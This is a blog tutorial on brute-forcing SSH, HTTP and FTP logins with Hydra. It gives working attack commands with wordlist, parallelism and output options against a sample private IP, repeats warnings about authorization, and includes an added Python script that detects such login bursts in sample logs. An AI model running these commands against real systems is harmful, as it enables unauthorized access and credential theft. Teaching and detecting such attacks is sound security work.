Sunday 9 February 2025

How to Perform a Brute Force Attack with Hydra

Learn how to perform a brute force attack using Hydra, a popular password-cracking tool. Discover how to use Hydra to attack common protocols like SSH, FTP, and HTTP in controlled environments for educational purposes.

What is Hydra?

Hydra is an open-source tool widely used for brute force attacks and password cracking. It supports a wide variety of protocols and services, such as SSH, FTP, HTTP, MySQL, and more. Brute force attacks involve attempting a large number of username and password combinations until the correct credentials are found.

Note: Brute force attacks should only be conducted in controlled environments with proper authorization. Performing such tests without proper consent is illegal.

Installing Hydra

Before getting started, you need to have Hydra installed on your system. Hydra is available on most Linux distributions, such as Kali Linux, where it comes pre-installed. If you don’t have it, you can install it easily with the following commands:

Installation on Kali Linux (pre-installed; verify with):

hydra -h

If Hydra is not installed, you can install it with:

sudo apt update
sudo apt install hydra

Installation on Other Debian-based Linux Distributions (apt):

sudo apt update
sudo apt install hydra

Installation on macOS (with Homebrew):

brew install hydra

Performing a Brute Force Attack with Hydra

Hydra can attack various services. Below, we cover some of the most common ones, such as SSH and HTTP. Before performing an attack, you need a list of possible usernames and passwords. These lists are known as wordlists. You can find some in /usr/share/wordlists/ in Kali Linux or create your own.

Brute Force Attack on SSH

Suppose we want to perform a brute force attack against an SSH server at 192.168.1.100. For this example, we will use a list of usernames and passwords.

Basic SSH Attack Command:

hydra -l user -P /path/to/wordlist.txt ssh://192.168.1.100
  • -l user: Specifies the username used in the attack.
  • -P /path/to/wordlist.txt: Specifies the path to the password list that Hydra will use.
  • ssh://192.168.1.100: Specifies the SSH protocol and the target IP or hostname.

Attack with Multiple Usernames:

If you want to test multiple usernames, you can use a username list instead of a single username.

hydra -L /path/to/userlist.txt -P /path/to/wordlist.txt ssh://192.168.1.100
  • -L /path/to/userlist.txt: List of usernames to test.

Brute Force Attack on HTTP

Hydra can also attack web services protected by basic HTTP authentication or login forms. Below is how to perform an attack against a web page protected with basic authentication.

Basic HTTP Authentication Attack:

hydra -l admin -P /path/to/wordlist.txt http-get://192.168.1.100/protected
  • http-get: Selects Hydra's HTTP GET module, which sends each username/password pair as HTTP basic authentication credentials with a GET request.
  • /protected: Path on the server protected by basic authentication.

Attack on an HTTP Login Form:

To attack a login form on a web page, you need to know the names of the username and password fields used in the form. You can obtain this by inspecting the page's HTML code.

hydra -l admin -P /path/to/wordlist.txt 192.168.1.100 http-post-form "/login:user=^USER^&password=^PASS^:Login error"
  • /login: Path of the login form.
  • user=^USER^&password=^PASS^: Structure of the form with the fields that should be filled with the username and password.
  • Login error: String in the server's response that indicates a failed login; Hydra treats any response that does not contain it as a successful login, so pick a string that appears only on failure.

Brute Force Attack on FTP

Hydra can also perform brute force attacks against FTP services.

Basic FTP Attack Command:

hydra -l user -P /path/to/wordlist.txt ftp://192.168.1.100

This command attempts to log into the FTP server with the specified username and password list.
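From the defender's side, the SSH and HTTP login-form attacks described above leave a recognisable trace: a burst of failed sshd logins, or of POSTs to the login path, from a single source within a short window. The following Python script is an added example (not part of the original post or of Hydra) that flags such bursts in constructed sshd and web-server access-log lines; the 60-second window, the threshold of 4, the 2025 year for syslog timestamps and the /login path are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from a real system): sshd syslog lines and web-server access-log lines.
SSHD_LOG = """\
Feb  9 10:00:01 host sshd[1201]: Failed password for invalid user admin from 192.168.1.50 port 51001 ssh2
Feb  9 10:00:01 host sshd[1202]: Failed password for root from 192.168.1.50 port 51002 ssh2
Feb  9 10:00:02 host sshd[1203]: Failed password for alice from 192.168.1.50 port 51003 ssh2
Feb  9 10:00:03 host sshd[1204]: Failed password for alice from 192.168.1.50 port 51004 ssh2
Feb  9 10:05:00 host sshd[1300]: Failed password for alice from 10.0.0.7 port 40000 ssh2
"""
# A failed form login usually still returns 200 (the "Login error" text is in the body),
# so the signal is the burst of POSTs to the login path, not the status code.
ACCESS_LOG = """\
192.168.1.60 - - [09/Feb/2025:10:10:00 +0000] "POST /login HTTP/1.1" 200 512
192.168.1.60 - - [09/Feb/2025:10:10:00 +0000] "POST /login HTTP/1.1" 200 512
192.168.1.60 - - [09/Feb/2025:10:10:01 +0000] "POST /login HTTP/1.1" 200 512
192.168.1.60 - - [09/Feb/2025:10:10:01 +0000] "POST /login HTTP/1.1" 200 512
10.0.0.8 - - [09/Feb/2025:10:10:05 +0000] "GET /login HTTP/1.1" 200 1024
10.0.0.8 - - [09/Feb/2025:10:10:20 +0000] "POST /login HTTP/1.1" 302 0
"""

SSHD_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
                     r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
HTTP_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "POST (?P<path>\S+)')

def parse_events(lines, login_path="/login"):
    """Yield (timestamp, source_ip, username) per attempt; username is None for HTTP."""
    for line in lines:
        if m := SSHD_RE.match(line):  # syslog lines carry no year; 2025 is assumed here
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=2025), m["ip"], m["user"]
        elif (m := HTTP_RE.match(line)) and m["path"] == login_path:
            yield datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None), m["ip"], None

def find_bursts(events, window=timedelta(seconds=60), threshold=4):
    """Return {ip: (total_attempts, usernames_tried)} for sources with >= threshold attempts in any window."""
    by_ip = defaultdict(list)
    for ts, ip, user in sorted(events, key=lambda e: e[0]):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        start = 0
        for end, (ts, _) in enumerate(attempts):
            while ts - attempts[start][0] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = (len(attempts), sorted({u for _, u in attempts if u}))
                break
    return flagged
```

Calling find_bursts(parse_events(SSHD_LOG.splitlines() + ACCESS_LOG.splitlines())) flags 192.168.1.50 (with the usernames it cycled through, the pattern a -L user list produces) and 192.168.1.60, while the single attempts from 10.0.0.7 and 10.0.0.8 stay below the threshold.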

Additional Options

Hydra offers many advanced options to fine-tune brute force attacks, such as specifying the number of parallel tasks, setting timeout limits between attempts, and more.

Limiting the Number of Parallel Tasks:

hydra -l admin -P /path/to/wordlist.txt -t 4 ssh://192.168.1.100
  • -t 4: Runs 4 tasks (login attempts) in parallel against the target. Hydra's default is 16; a lower value reduces the load on the target and the chance of connections being refused, while a higher value increases the attack speed.

Saving Results to a File:

hydra -l admin -P /path/to/wordlist.txt ssh://192.168.1.100 -o results.txt
  • -o results.txt: Saves the results to the results.txt file.

Testing Previously Obtained Credentials

If you already have specific credentials and only want to validate them, you can use Hydra to confirm if the credentials are correct.

hydra -l admin -p password123 ssh://192.168.1.100

In this example, we attempt to log in with the username admin and password password123.

The use of tools like Hydra for brute force attacks must be limited to testing environments or systems for which you have explicit authorization. Conducting brute force attacks without permission is illegal and can have severe legal consequences. Hydra is a powerful tool, but it should be used responsibly and ethically.

Conclusion

Hydra is a robust tool for performing brute force attacks against a wide range of services. By learning to use it correctly, you can test the security of your own systems and strengthen them against potential attacks. However, always remember that any security testing must be conducted ethically and with proper permissions.

More Information

For more details on how to use Hydra and all its advanced options, visit the official Hydra documentation.

Created by:

Jorge García

Fullstack developer